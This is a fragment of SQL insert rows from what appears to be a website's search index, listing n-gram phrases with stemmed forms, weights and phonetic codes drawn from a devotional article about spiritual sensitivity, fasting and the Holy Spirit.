(321704, '“therefore if', '“therefor if', 0, 1, 1.4333, '“36161', 1, '*'),
(321705, '“therefore if any', '“therefor if any', 0, 1, 1.5667, '“361615', 1, '*'),
(321706, '“this is', '“thi is', 0, 1, 1.2667, '“320', 1, '*'),
(321707, '“this is a', '“thi is a', 0, 1, 1.3333, '“320', 1, '*'),
(321708, '“what will', '“what will', 0, 1, 1.3333, '“340', 1, '*'),
(321709, '“what will you', '“what will you', 0, 1, 1.4667, '“340', 1, '*'),
(322733, '47', '47', 0, 0, 0.2, '', 1, '*'),
(322734, '47 from', '47 from', 0, 1, 1.2333, 'F650', 1, '*'),
(322735, '47 from our', '47 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(322736, 'item 47', 'item 47', 0, 1, 1.2333, 'I350', 1, '*'),
(322737, 'item 47 from', 'item 47 from', 0, 1, 1.4, 'I35165', 1, '*'),
(322738, 'k2 item 47', 'k2 item 47', 0, 1, 1.3333, 'K350', 1, '*'),
(323767, '08 2018', '08 2018', 0, 1, 1.2333, '', 2, '*'),
(323829, 'abundantly', 'abundantli', 0, 0, 0.6667, 'A153534', 2, '*'),
(323830, 'abundantly above', 'abundantli above', 0, 1, 1.5333, 'A1535341', 2, '*'),
(323912, 'be careful what', 'be careful what', 0, 1, 1.5, 'B26143', 2, '*'),
(323934, 'break into', 'break into', 0, 1, 1.3333, 'B6253', 2, '*'),
(323935, 'break into the', 'break into the', 0, 1, 1.4667, 'B6253', 2, '*'),
(323956, 'careful what', 'care what', 0, 1, 1.4, 'C6143', 2, '*'),
(323957, 'careful what you', 'care what you', 0, 1, 1.5333, 'C6143', 2, '*'),
(324066, 'exceeding abundantly', 'exceed abundantly', 0, 1, 1.6667, 'E2352153534', 2, '*'),
(324067, 'exceeding abundantly above', 'exceed abundantly above', 0, 1, 1.8667, 'E23521535341', 2, '*'),
(324159, 'holy spirit 1', 'holi spirit 1', 0, 1, 1.4333, 'H42163', 2, '*'),
(324166, 'holy spirit is', 'holi spirit is', 0, 1, 1.4667, 'H421632', 2, '*'),
(324172, 'holy spirit will', 'holi spirit will', 0, 1, 1.5333, 'H421634', 2, '*'),
(324174, 'holy spirit you', 'holi spirit you', 0, 1, 1.5, 'H42163', 2, '*'),
(324321, 'normal life', 'normal life', 0, 1, 1.3667, 'N6541', 2, '*'),
(324369, 'of the ways', 'of the ways', 0, 1, 1.3667, 'O132', 2, '*'),
(324459, 'safe', 'safe', 0, 0, 0.2667, 'S100', 2, '*'),
(324512, 'spirit 1', 'spirit 1', 0, 1, 1.2667, 'S163', 2, '*'),
(324546, 'spirit you', 'spirit you', 0, 1, 1.3333, 'S163', 2, '*'),
(324662, 'to that', 'to that', 0, 1, 1.2333, 'T000', 2, '*'),
(324786, '1 maintain', '1 maintain', 0, 1, 1.3333, 'M350', 1, '*'),
(324787, '1 maintain a', '1 maintain a', 0, 1, 1.4, 'M350', 1, '*'),
(324788, '1 no', '1 no', 0, 1, 1.1333, 'N000', 1, '*'),
(324789, '1 no sensitivity', '1 no sensitivity', 0, 1, 1.5333, 'N252313', 1, '*'),
(324790, '10 practise', '10 practise', 0, 1, 1.3667, 'P6232', 1, '*'),
(324791, '10 practise instant', '10 practise instant', 0, 1, 1.6333, 'P623252353', 1, '*'),
(324792, '10 years', '10 years', 0, 1, 1.2667, 'Y620', 1, '*'),
(324793, '10 years of', '10 years of', 0, 1, 1.3667, 'Y621', 1, '*'),
(324794, '18 surely', '18 surely', 0, 1, 1.3, 'S640', 1, '*'),
(324795, '18 surely the', '18 surely the', 0, 1, 1.4333, 'S643', 1, '*'),
(324796, '2 feed more', '2 feed more', 0, 1, 1.3667, 'F356', 1, '*'),
(324797, '2 low', '2 low', 0, 1, 1.1667, 'L000', 1, '*'),
(324798, '2 low sensitivity', '2 low sensitivity', 0, 1, 1.5667, 'L252313', 1, '*'),
(324799, '26 08', '26 08', 0, 1, 1.1667, '', 1, '*'),
(324800, '26 08 2018', '26 08 2018', 0, 1, 1.3333, '', 1, '*'),
(324801, '26 18', '26 18', 0, 1, 1.1667, '', 1, '*'),
(324802, '26 18 surely', '26 18 surely', 0, 1, 1.4, 'S640', 1, '*'),
(324803, '3 increase', '3 increase', 0, 1, 1.3333, 'I5262', 1, '*'),
(324804, '3 increase your', '3 increase your', 0, 1, 1.5, 'I52626', 1, '*'),
(324805, '3 sensitive', '3 sensitive', 0, 1, 1.3667, 'S5231', 1, '*'),
(324806, '3 sensitive 4', '3 sensitive 4', 0, 1, 1.4333, 'S5231', 1, '*'),
(324807, '4 fast', '4 fast', 0, 1, 1.2, 'F230', 1, '*'),
(324808, '4 fast regularly', '4 fast regularly', 0, 1, 1.5333, 'F2362464', 1, '*'),
(324809, '4 high', '4 high', 0, 1, 1.2, 'H200', 1, '*'),
(324810, '4 high sensitivity', '4 high sensitivity', 0, 1, 1.6, 'H252313', 1, '*'),
(324811, '5 stay', '5 stay', 0, 1, 1.2, 'S300', 1, '*'),
(324812, '5 stay away', '5 stay away', 0, 1, 1.3667, 'S300', 1, '*'),
(324813, '6 maintain', '6 maintain', 0, 1, 1.3333, 'M350', 1, '*'),
(324814, '6 maintain close', '6 maintain close', 0, 1, 1.5333, 'M35242', 1, '*'),
(324815, '61', '61', 0, 0, 0.2, '', 1, '*'),
(324816, '61 from', '61 from', 0, 1, 1.2333, 'F650', 1, '*'),
(324817, '61 from our', '61 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(324818, '7 allow', '7 allow', 0, 1, 1.2333, 'A400', 1, '*'),
(324819, '7 allow the', '7 allow the', 0, 1, 1.3667, 'A430', 1, '*'),
(324820, '8 avoid', '8 avoid', 0, 1, 1.2333, 'A130', 1, '*'),
(324821, '8 avoid negative', '8 avoid negative', 0, 1, 1.5333, 'A135231', 1, '*'),
(324822, '9 avoid', '9 avoid', 0, 1, 1.2333, 'A130', 1, '*'),
(324823, '9 avoid wrong', '9 avoid wrong', 0, 1, 1.4333, 'A13652', 1, '*'),
(324824, 'a doctor going', 'a doctor going', 0, 1, 1.4667, 'A3236252', 1, '*'),
(324825, 'a great life', 'a great life', 0, 1, 1.4, 'A26341', 1, '*'),
(324826, 'a high', 'a high', 0, 1, 1.2, 'A200', 1, '*'),
(324827, 'a high level', 'a high level', 0, 1, 1.4, 'A2414', 1, '*'),
(324828, 'a high sensitivity', 'a high sensitivity', 0, 1, 1.6, 'A252313', 1, '*'),
(324829, 'a man manifesting', 'a man manifesting', 0, 1, 1.5667, 'A512352', 1, '*'),
(324830, 'a message as', 'a message as', 0, 1, 1.4, 'A520', 1, '*'),
(324831, 'a normal', 'a normal', 0, 1, 1.2667, 'A5654', 1, '*'),
(324832, 'a normal life', 'a normal life', 0, 1, 1.4333, 'A56541', 1, '*'),
(324833, 'a place that', 'a place that', 0, 1, 1.4, 'A1423', 1, '*'),
(324834, 'a pure', 'a pure', 0, 1, 1.2, 'A160', 1, '*'),
(324835, 'a pure conscience', 'a pure conscience', 0, 1, 1.5667, 'A1625252', 1, '*'),
(324836, 'a senior', 'a senior', 0, 1, 1.2667, 'A256', 1, '*'),
(324837, 'a senior military', 'a senior military', 0, 1, 1.5667, 'A2565436', 1, '*'),
(324838, 'a senior police', 'a senior police', 0, 1, 1.5, 'A256142', 1, '*'),
(324839, 'a world that', 'a world that', 0, 1, 1.4, 'A643', 1, '*'),
(324840, 'above life', 'abov life', 0, 1, 1.3333, 'A141', 1, '*'),
(324841, 'above life there', 'abov life there', 0, 1, 1.5333, 'A14136', 1, '*'),
(324842, 'abundance and', 'abund and', 0, 1, 1.4333, 'A1535253', 1, '*'),
(324843, 'abundance and stress-free', 'abund and stress-free', 0, 1, 1.8333, 'A1535253236216', 1, '*'),
(324844, 'abundantly above life', 'abundantli above life', 0, 1, 1.7, 'A153534141', 1, '*'),
(324845, 'again man', 'again man', 0, 1, 1.3, 'A250', 1, '*'),
(324846, 'again man can', 'again man can', 0, 1, 1.4333, 'A2525', 1, '*'),
(324847, 'all this is', 'all this is', 0, 1, 1.3667, 'A432', 1, '*'),
(324848, 'alliances', 'allianc', 0, 0, 0.6, 'A452', 1, '*'),
(324849, 'alliances 10', 'allianc 10', 0, 1, 1.4, 'A452', 1, '*'),
(324850, 'alliances 10 practise', 'allianc 10 practise', 0, 1, 1.7, 'A45216232', 1, '*'),
(324851, 'alright', 'alright', 0, 0, 0.4667, 'A4623', 1, '*'),
(324852, 'alright for', 'alright for', 0, 1, 1.3667, 'A462316', 1, '*'),
(324853, 'alright for you', 'alright for you', 0, 1, 1.5, 'A462316', 1, '*'),
(324854, 'an effective minister', 'an effective minister', 0, 1, 1.7, 'A512315236', 1, '*'),
(324855, 'and be sensitive', 'and be sensitive', 0, 1, 1.5333, 'A53125231', 1, '*'),
(324856, 'and except', 'and except', 0, 1, 1.3333, 'A53213', 1, '*'),
(324857, 'and except to', 'and except to', 0, 1, 1.4333, 'A53213', 1, '*'),
(324858, 'and i did', 'and i did', 0, 1, 1.3, 'A530', 1, '*'),
(324859, 'and no', 'and no', 0, 1, 1.2, 'A535', 1, '*'),
(324860, 'and no character', 'and no character', 0, 1, 1.5333, 'A53526236', 1, '*'),
(324861, 'and no sensitivity', 'and no sensitivity', 0, 1, 1.6, 'A535252313', 1, '*'),
(324862, 'and stress-free', 'and stress-free', 0, 1, 1.5, 'A53236216', 1, '*'),
(324863, 'and stress-free life', 'and stress-free life', 0, 1, 1.6667, 'A5323621641', 1, '*'),
(324864, 'and the danger', 'and the danger', 0, 1, 1.4667, 'A53526', 1, '*'),
(324865, 'and tomorrow', 'and tomorrow', 0, 1, 1.4, 'A5356', 2, '*'),
(324866, 'and tomorrow why', 'and tomorrow why', 0, 1, 1.5333, 'A5356', 1, '*'),
(324867, 'and unholy', 'and unholy', 0, 1, 1.3333, 'A5354', 1, '*'),
(324868, 'and unholy alliances', 'and unholy alliances', 0, 1, 1.6667, 'A535452', 1, '*'),
(324869, 'any job', 'ani job', 0, 1, 1.2333, 'A521', 1, '*'),
(324870, 'any job that', 'ani job that', 0, 1, 1.4, 'A5213', 1, '*'),
(324871, 'appears', 'appear', 0, 0, 0.4667, 'A162', 1, '*'),
(324872, 'appears whether', 'appear whether', 0, 1, 1.5, 'A16236', 1, '*'),
(324873, 'appears whether good', 'appear whether good', 0, 1, 1.6667, 'A1623623', 1, '*'),
(324874, 'are dangerous', 'ar dangerous', 0, 1, 1.4333, 'A635262', 1, '*'),
(324875, 'are dangerous low', 'ar dangerous low', 0, 1, 1.5667, 'A6352624', 1, '*'),
(324876, 'are four', 'ar four', 0, 1, 1.2667, 'A616', 1, '*'),
(324877, 'are four levels', 'ar four levels', 0, 1, 1.5, 'A6164142', 1, '*'),
(324878, 'are going to', 'ar going to', 0, 1, 1.4, 'A62523', 1, '*'),
(324879, 'are now', 'ar now', 0, 1, 1.2333, 'A650', 1, '*'),
(324880, 'are now god', 'ar now god', 0, 1, 1.3667, 'A6523', 1, '*'),
(324881, 'are working in', 'ar working in', 0, 1, 1.4667, 'A62525', 1, '*'),
(324882, 'as it', 'as it', 0, 1, 1.1667, 'A230', 1, '*'),
(324883, 'as it appears', 'as it appears', 0, 1, 1.4333, 'A23162', 1, '*'),
(324884, 'as you fall', 'as you fall', 0, 1, 1.3667, 'A214', 1, '*'),
(324885, 'asleep', 'asleep', 0, 0, 0.4, 'A241', 1, '*'),
(324886, 'asleep 6', 'asleep 6', 0, 1, 1.2667, 'A241', 1, '*'),
(324887, 'asleep 6 maintain', 'asleep 6 maintain', 0, 1, 1.5667, 'A241535', 1, '*'),
(324888, 'asleep in', 'asleep in', 0, 1, 1.3, 'A2415', 1, '*'),
(324889, 'asleep in front', 'asleep in front', 0, 1, 1.5, 'A24151653', 1, '*'),
(324890, 'association', 'associ', 0, 0, 0.7333, 'A235', 1, '*'),
(324891, 'association ungodly', 'associ ungodly', 0, 1, 1.6333, 'A235234', 1, '*'),
(324892, 'association ungodly and', 'associ ungodly and', 0, 1, 1.7667, 'A23523453', 1, '*'),
(324893, 'at a doctor', 'at a doctor', 0, 1, 1.3667, 'A3236', 1, '*'),
(324894, 'at all this', 'at all this', 0, 1, 1.3667, 'A3432', 1, '*'),
(324895, 'atmosphere it', 'atmospher it', 0, 1, 1.4333, 'A352163', 1, '*'),
(324896, 'atmosphere it can', 'atmospher it can', 0, 1, 1.5667, 'A35216325', 1, '*'),
(324897, 'available to man', 'avail to man', 0, 1, 1.5333, 'A141435', 1, '*'),
(324898, 'avoid falling', 'avoid falling', 0, 1, 1.4333, 'A131452', 1, '*'),
(324899, 'avoid falling asleep', 'avoid falling asleep', 0, 1, 1.6667, 'A13145241', 1, '*'),
(324900, 'avoid negative', 'avoid negative', 0, 1, 1.4667, 'A135231', 1, '*'),
(324901, 'avoid negative passion', 'avoid negative passion', 0, 1, 1.7333, 'A13523125', 1, '*'),
(324902, 'avoid wrong', 'avoid wrong', 0, 1, 1.3667, 'A13652', 1, '*'),
(324903, 'avoid wrong association', 'avoid wrong association', 0, 1, 1.7667, 'A1365235', 1, '*'),
(324904, 'awareness', 'awar', 0, 0, 0.6, 'A652', 1, '*'),
(324905, 'awareness of', 'awar of', 0, 1, 1.4, 'A6521', 1, '*'),
(324906, 'awareness of the', 'awar of the', 0, 1, 1.5333, 'A65213', 1, '*'),
(324907, 'away from unanointed', 'awai from unanointed', 0, 1, 1.6667, 'A1653', 1, '*'),
(324908, 'away with meals', 'awai with meals', 0, 1, 1.5, 'A3542', 1, '*'),
(324909, 'bad you', 'bad you', 0, 1, 1.2333, 'B300', 1, '*'),
(324910, 'bad you may', 'bad you may', 0, 1, 1.3667, 'B350', 1, '*'),
(324911, 'baptise', 'baptis', 0, 0, 0.4667, 'B320', 1, '*'),
(324912, 'baptise you', 'baptis you', 0, 1, 1.3667, 'B320', 1, '*'),
(324913, 'baptise you with', 'baptis you with', 0, 1, 1.5333, 'B323', 1, '*'),
(324914, 'be a senior', 'be a senior', 0, 1, 1.3667, 'B256', 1, '*'),
(324915, 'be an effective', 'be an effective', 0, 1, 1.5, 'B51231', 1, '*'),
(324916, 'be moody', 'be moody', 0, 1, 1.2667, 'B530', 1, '*'),
(324917, 'be moody and', 'be moody and', 0, 1, 1.4, 'B5353', 1, '*'),
(324918, 'be rubbing', 'be rubbing', 0, 1, 1.3333, 'B6152', 1, '*'),
(324919, 'be rubbing spirit', 'be rubbing spirit', 0, 1, 1.5667, 'B6152163', 1, '*'),
(324920, 'be sensitive', 'be sensitive', 0, 1, 1.4, 'B25231', 2, '*'),
(324921, 'be sensitive to', 'be sensitive to', 0, 1, 1.5, 'B252313', 1, '*'),
(324922, 'be sensitivity', 'be sensitivity', 0, 1, 1.4667, 'B252313', 1, '*'),
(324923, 'be sensitivity guiding', 'be sensitivity guiding', 0, 1, 1.7333, 'B2523132352', 1, '*'),
(324924, 'be sharpened', 'be sharpened', 0, 1, 1.4, 'B26153', 1, '*'),
(324925, 'be sharpened 7', 'be sharpened 7', 0, 1, 1.4667, 'B26153', 1, '*'),
(324926, 'beloved enhancing', 'belov enhancing', 0, 1, 1.5667, 'B4135252', 1, '*'),
(324927, 'beloved enhancing your', 'belov enhancing your', 0, 1, 1.7333, 'B41352526', 1, '*'),
(324928, 'below are some', 'below are some', 0, 1, 1.4667, 'B4625', 1, '*'),
(324929, 'born again man', 'born again man', 0, 1, 1.4667, 'B6525', 1, '*'),
(324930, 'business but', 'busi but', 0, 1, 1.4, 'B25213', 1, '*'),
(324931, 'business but that', 'busi but that', 0, 1, 1.5667, 'B25213', 1, '*'),
(324932, 'but that could', 'but that could', 0, 1, 1.4667, 'B3243', 1, '*'),
(324933, 'but through', 'but through', 0, 1, 1.3667, 'B362', 1, '*'),
(324934, 'but through your', 'but through your', 0, 1, 1.5333, 'B3626', 1, '*'),
(324935, 'but you need', 'but you need', 0, 1, 1.4, 'B353', 1, '*'),
(324936, 'can deaden', 'can deaden', 0, 1, 1.3333, 'C535', 1, '*'),
(324937, 'can deaden your', 'can deaden your', 0, 1, 1.5, 'C5356', 1, '*'),
(324938, 'can get', 'can get', 0, 1, 1.2333, 'C523', 1, '*'),
(324939, 'can get to', 'can get to', 0, 1, 1.3333, 'C523', 1, '*'),
(324940, 'can tell', 'can tell', 0, 1, 1.2667, 'C534', 1, '*'),
(324941, 'can tell you', 'can tell you', 0, 1, 1.4, 'C534', 1, '*'),
(324942, 'can\'t be', 'can be', 0, 1, 1.2667, 'C531', 1, '*'),
(324943, 'can\'t be rubbing', 'can be rubbing', 0, 1, 1.5333, 'C5316152', 1, '*'),
(324944, 'cannot be moody', 'cannot be moody', 0, 1, 1.5, 'C53153', 1, '*'),
(324945, 'careful 2', 'care 2', 0, 1, 1.3, 'C614', 1, '*'),
(324946, 'careful 2 low', 'care 2 low', 0, 1, 1.4333, 'C614', 1, '*'),
(324947, 'character 8', 'charact 8', 0, 1, 1.3667, 'C6236', 1, '*'),
(324948, 'character 8 avoid', 'charact 8 avoid', 0, 1, 1.5667, 'C623613', 1, '*'),
(324949, 'character is formed', 'charact is formed', 0, 1, 1.6333, 'C623621653', 1, '*'),
(324950, 'character is not', 'charact is not', 0, 1, 1.5333, 'C6236253', 1, '*'),
(324951, 'character than', 'charact than', 0, 1, 1.4667, 'C623635', 1, '*'),
(324952, 'character than a', 'charact than a', 0, 1, 1.5333, 'C623635', 1, '*'),
(324953, 'committed to a', 'commit to a', 0, 1, 1.4667, 'C530', 1, '*'),
(324954, 'conscience 2', 'conscienc 2', 0, 1, 1.4, 'C5252', 1, '*'),
(324955, 'conscience 2 feed', 'conscienc 2 feed', 0, 1, 1.5667, 'C525213', 1, '*'),
(324956, 'could be sensitivity', 'could be sensitivity', 0, 1, 1.6667, 'C431252313', 1, '*'),
(324957, 'cross from', 'cross from', 0, 1, 1.3333, 'C62165', 1, '*'),
(324958, 'cross from a', 'cross from a', 0, 1, 1.4, 'C62165', 1, '*'),
(324959, 'danger there', 'danger there', 0, 1, 1.4, 'D52636', 1, '*'),
(324960, 'danger there require', 'danger there require', 0, 1, 1.6667, 'D5263626', 1, '*'),
(324961, 'dangerous low', 'danger low', 0, 1, 1.4333, 'D52624', 1, '*'),
(324962, 'dangerous low and', 'danger low and', 0, 1, 1.5667, 'D5262453', 1, '*'),
(324963, 'dead spirits', 'dead spirits', 0, 1, 1.4, 'D21632', 1, '*'),
(324964, 'dead spirits and', 'dead spirits and', 0, 1, 1.5333, 'D2163253', 1, '*'),
(324965, 'deaden', 'deaden', 0, 0, 0.4, 'D500', 1, '*'),
(324966, 'deaden your', 'deaden your', 0, 1, 1.3667, 'D560', 1, '*'),
(324967, 'deaden your spirit', 'deaden your spirit', 0, 1, 1.6, 'D562163', 1, '*'),
(324968, 'dearly beloved enhancing', 'dearli beloved enhancing', 0, 1, 1.8, 'D6414135252', 1, '*'),
(324969, 'dense spiritually', 'dens spiritually', 0, 1, 1.5667, 'D521634', 1, '*'),
(324970, 'dense spiritually a', 'dens spiritually a', 0, 1, 1.6333, 'D521634', 1, '*'),
(324971, 'did not know', 'did not know', 0, 1, 1.4, 'D5325', 1, '*'),
(324972, 'disobedience to the', 'disobedi to the', 0, 1, 1.6333, 'D213523', 1, '*'),
(324973, 'do away', 'do away', 0, 1, 1.2333, 'D000', 1, '*'),
(324974, 'do away with', 'do away with', 0, 1, 1.4, 'D000', 1, '*'),
(324975, 'do not have', 'do not have', 0, 1, 1.3667, 'D531', 2, '*'),
(324976, 'doctor going', 'doctor going', 0, 1, 1.4, 'D236252', 1, '*'),
(324977, 'doctor going into', 'doctor going into', 0, 1, 1.5667, 'D23625253', 1, '*'),
(324978, 'doesn\'t sound', 'doesn sound', 0, 1, 1.4333, 'D253253', 1, '*'),
(324979, 'doesn\'t sound normal', 'doesn sound normal', 0, 1, 1.6667, 'D2532535654', 1, '*'),
(324980, 'don\'t you let', 'don you let', 0, 1, 1.4333, 'D5343', 1, '*'),
(324981, 'effective minister', 'effect minister', 0, 1, 1.6, 'E12315236', 1, '*'),
(324982, 'effective minister of', 'effect minister of', 0, 1, 1.7, 'E123152361', 1, '*'),
(324983, 'embarrass', 'embarrass', 0, 0, 0.6, 'E5162', 1, '*'),
(324984, 'embarrass you', 'embarrass you', 0, 1, 1.4333, 'E5162', 1, '*'),
(324985, 'embarrass you somewhere', 'embarrass you somewhere', 0, 1, 1.7667, 'E516256', 1, '*'),
(324986, 'enhances', 'enhanc', 0, 0, 0.5333, 'E520', 1, '*'),
(324987, 'enhances your', 'enhanc your', 0, 1, 1.4333, 'E526', 1, '*'),
(324988, 'enhances your awareness', 'enhanc your awareness', 0, 1, 1.7667, 'E52652', 1, '*'),
(324989, 'enhancing', 'enhanc', 0, 0, 0.6, 'E5252', 1, '*'),
(324990, 'enhancing your', 'enhanc your', 0, 1, 1.4667, 'E52526', 1, '*'),
(324991, 'enhancing your sensitivity', 'enhanc your sensitivity', 0, 1, 1.8667, 'E52526252313', 1, '*'),
(324992, 'etc you', 'etc you', 0, 1, 1.2333, 'E320', 1, '*'),
(324993, 'etc you need', 'etc you need', 0, 1, 1.4, 'E3253', 1, '*'),
(324994, 'even though', 'even though', 0, 1, 1.3667, 'E1532', 1, '*'),
(324995, 'even though it', 'even though it', 0, 1, 1.4667, 'E15323', 1, '*'),
(324996, 'everything that', 'everyth that', 0, 1, 1.5, 'E163523', 1, '*'),
(324997, 'everything that has', 'everyth that has', 0, 1, 1.6333, 'E1635232', 1, '*'),
(324998, 'except to', 'except to', 0, 1, 1.3, 'E213', 1, '*'),
(324999, 'except to be', 'except to be', 0, 1, 1.4, 'E2131', 1, '*'),
(325000, 'fall asleep', 'fall asleep', 0, 1, 1.3667, 'F4241', 1, '*'),
(325001, 'fall asleep 6', 'fall asleep 6', 0, 1, 1.4333, 'F4241', 1, '*'),
(325002, 'falling', 'fall', 0, 0, 0.4667, 'F452', 1, '*'),
(325003, 'falling asleep', 'fall asleep', 0, 1, 1.4667, 'F45241', 1, '*'),
(325004, 'falling asleep in', 'fall asleep in', 0, 1, 1.5667, 'F452415', 1, '*'),
(325005, 'fast regularly', 'fast regularly', 0, 1, 1.4667, 'F2362464', 1, '*'),
(325006, 'fast regularly fasting', 'fast regularly fasting', 0, 1, 1.7333, 'F236246412352', 1, '*'),
(325007, 'fasting enhances', 'fast enhances', 0, 1, 1.5333, 'F235252', 1, '*'),
(325008, 'fasting enhances your', 'fast enhances your', 0, 1, 1.7, 'F2352526', 1, '*'),
(325009, 'feed more', 'feed more', 0, 1, 1.3, 'F356', 1, '*'),
(325010, 'feed more on', 'feed more on', 0, 1, 1.4, 'F3565', 1, '*'),
(325011, 'flow in', 'flow in', 0, 1, 1.2333, 'F450', 1, '*'),
(325012, 'flow in the', 'flow in the', 0, 1, 1.3667, 'F453', 1, '*'),
(325013, 'flow learn', 'flow learn', 0, 1, 1.3333, 'F465', 1, '*'),
(325014, 'flow learn to', 'flow learn to', 0, 1, 1.4333, 'F4653', 1, '*'),
(325015, 'for you but', 'for you but', 0, 1, 1.3667, 'F613', 1, '*'),
(325016, 'for yourself', 'for yourself', 0, 1, 1.4, 'F6241', 1, '*'),
(325017, 'for yourself that', 'for yourself that', 0, 1, 1.5667, 'F62413', 1, '*'),
(325018, 'formed a', 'form a', 0, 1, 1.2667, 'F653', 1, '*'),
(325019, 'formed a man', 'form a man', 0, 1, 1.4, 'F6535', 1, '*'),
(325020, 'four', 'four', 0, 0, 0.2667, 'F600', 1, '*'),
(325021, 'four levels', 'four levels', 0, 1, 1.3667, 'F64142', 1, '*'),
(325022, 'four levels of', 'four levels of', 0, 1, 1.4667, 'F641421', 1, '*'),
(325023, 'from a normal', 'from a normal', 0, 1, 1.4333, 'F65654', 1, '*'),
(325024, 'from unanointed', 'from unanointed', 0, 1, 1.5, 'F653', 1, '*'),
(325025, 'from unanointed atmosphere', 'from unanointed atmosphere', 0, 1, 1.8667, 'F6535216', 1, '*'),
(325026, 'front of tv', 'front of tv', 0, 1, 1.3667, 'F653131', 1, '*'),
(325027, 'genesis 26 18', 'genesi 26 18', 0, 1, 1.4333, 'G520', 1, '*'),
(325028, 'get to that', 'get to that', 0, 1, 1.3667, 'G300', 1, '*'),
(325029, 'ghost be', 'ghost be', 0, 1, 1.2667, 'G310', 1, '*'),
(325030, 'ghost be careful', 'ghost be careful', 0, 1, 1.5333, 'G312614', 1, '*'),
(325031, 'gifts and no', 'gift and no', 0, 1, 1.4, 'G132535', 1, '*'),
(325032, 'god 3 increase', 'god 3 increase', 0, 1, 1.4667, 'G35262', 1, '*'),
(325033, 'god 4', 'god 4', 0, 1, 1.1667, 'G300', 1, '*'),
(325034, 'god 4 fast', 'god 4 fast', 0, 1, 1.3333, 'G3123', 1, '*'),
(325035, 'god is in', 'god is in', 0, 1, 1.3, 'G325', 1, '*'),
(325036, 'god lives', 'god lives', 0, 1, 1.3, 'G3412', 1, '*'),
(325037, 'god lives in', 'god lives in', 0, 1, 1.4, 'G34125', 1, '*'),
(325038, 'going into hotel', 'go into hotel', 0, 1, 1.5333, 'G52534', 1, '*'),
(325039, 'going to baptise', 'go to baptise', 0, 1, 1.5333, 'G523132', 1, '*'),
(325040, 'going to be', 'go to be', 0, 1, 1.3667, 'G5231', 1, '*'),
(325041, 'good or', 'good or', 0, 1, 1.2333, 'G360', 1, '*'),
(325042, 'good or bad', 'good or bad', 0, 1, 1.3667, 'G3613', 1, '*'),
(325043, 'gospel you', 'gospel you', 0, 1, 1.3333, 'G140', 1, '*'),
(325044, 'gospel you need', 'gospel you need', 0, 1, 1.5, 'G1453', 1, '*'),
(325045, 'great life', 'great life', 0, 1, 1.3333, 'G6341', 1, '*'),
(325046, 'great life highlighted', 'great life highlighted', 0, 1, 1.7333, 'G63412423', 1, '*'),
(325047, 'greatness', 'great', 0, 0, 0.6, 'G6352', 1, '*'),
(325048, 'greatness will', 'great will', 0, 1, 1.4667, 'G63524', 1, '*'),
(325049, 'greatness will not', 'great will not', 0, 1, 1.6, 'G6352453', 1, '*'),
(325050, 'guarantee', 'guarante', 0, 0, 0.6, 'G653', 1, '*'),
(325051, 'guarantee you', 'guarante you', 0, 1, 1.4333, 'G653', 1, '*'),
(325052, 'guarantee you 10', 'guarante you 10', 0, 1, 1.5333, 'G653', 1, '*'),
(325053, 'guiding', 'guid', 0, 0, 0.4667, 'G352', 1, '*'),
(325054, 'guiding him', 'guid him', 0, 1, 1.3667, 'G3525', 1, '*'),
(325055, 'guiding him even', 'guid him even', 0, 1, 1.5333, 'G352515', 1, '*'),
(325056, 'have the flow', 'have the flow', 0, 1, 1.4333, 'H1314', 1, '*'),
(325057, 'he can', 'he can', 0, 1, 1.2, 'H250', 1, '*'),
(325058, 'he can tell', 'he can tell', 0, 1, 1.3667, 'H2534', 1, '*'),
(325059, 'heart 26 08', 'heart 26 08', 0, 1, 1.3667, 'H630', 1, '*'),
(325060, 'heed to lying', 'heed to lying', 0, 1, 1.4333, 'H3452', 1, '*'),
(325061, 'heighten', 'heighten', 0, 0, 0.5333, 'H235', 1, '*'),
(325062, 'heighten your', 'heighten your', 0, 1, 1.4333, 'H2356', 1, '*'),
(325063, 'heighten your signals', 'heighten your signals', 0, 1, 1.7, 'H23562542', 1, '*'),
(325064, 'high level', 'high level', 0, 1, 1.3333, 'H2414', 1, '*'),
(325065, 'high level of', 'high level of', 0, 1, 1.4333, 'H24141', 1, '*'),
(325066, 'high sensitivity', 'high sensitivity', 0, 1, 1.5333, 'H252313', 1, '*'),
(325067, 'high sensitivity for', 'high sensitivity for', 0, 1, 1.6667, 'H25231316', 1, '*'),
(325068, 'high sensitivity out', 'high sensitivity out', 0, 1, 1.6667, 'H252313', 1, '*'),
(325069, 'high sensitivity pray', 'high sensitivity pray', 0, 1, 1.7, 'H25231316', 1, '*'),
(325070, 'highlighted below', 'highlight below', 0, 1, 1.5667, 'H242314', 1, '*'),
(325071, 'highlighted below are', 'highlight below are', 0, 1, 1.7, 'H2423146', 1, '*'),
(325072, 'him even', 'him even', 0, 1, 1.2667, 'H515', 1, '*'),
(325073, 'him even though', 'him even though', 0, 1, 1.5, 'H51532', 1, '*'),
(325074, 'him share', 'him share', 0, 1, 1.3, 'H526', 1, '*'),
(325075, 'him share that', 'him share that', 0, 1, 1.4667, 'H5263', 1, '*'),
(325076, 'his journey', 'hi journey', 0, 1, 1.3667, 'H265', 1, '*'),
(325077, 'his journey with', 'hi journey with', 0, 1, 1.5333, 'H2653', 1, '*'),
(325078, 'holy ghost be', 'holi ghost be', 0, 1, 1.4333, 'H4231', 1, '*'),
(325079, 'holy spirit god', 'holi spirit god', 0, 1, 1.5, 'H4216323', 1, '*'),
(325080, 'holy spirit this', 'holi spirit this', 0, 1, 1.5333, 'H421632', 1, '*'),
(325081, 'hotel', 'hotel', 0, 0, 0.3333, 'H340', 1, '*'),
(325082, 'hotel business', 'hotel business', 0, 1, 1.4667, 'H341252', 1, '*'),
(325083, 'hotel business but', 'hotel business but', 0, 1, 1.6, 'H34125213', 1, '*'),
(325084, 'i did', 'i did', 0, 1, 1.1667, 'I300', 1, '*'),
(325085, 'i did not', 'i did not', 0, 1, 1.3, 'I353', 1, '*'),
(325086, 'in a place', 'in a place', 0, 1, 1.3333, 'I5142', 1, '*'),
(325087, 'in genesis', 'in genesis', 0, 1, 1.3333, 'I5252', 1, '*'),
(325088, 'in genesis 26', 'in genesis 26', 0, 1, 1.4333, 'I5252', 1, '*'),
(325089, 'in his journey', 'in his journey', 0, 1, 1.4667, 'I5265', 1, '*'),
(325090, 'in this place', 'in this place', 0, 1, 1.4333, 'I532142', 1, '*'),
(325091, 'in yesterday', 'in yesterday', 0, 1, 1.4, 'I52363', 1, '*'),
(325092, 'in yesterday today', 'in yesterday today', 0, 1, 1.6, 'I52363', 1, '*'),
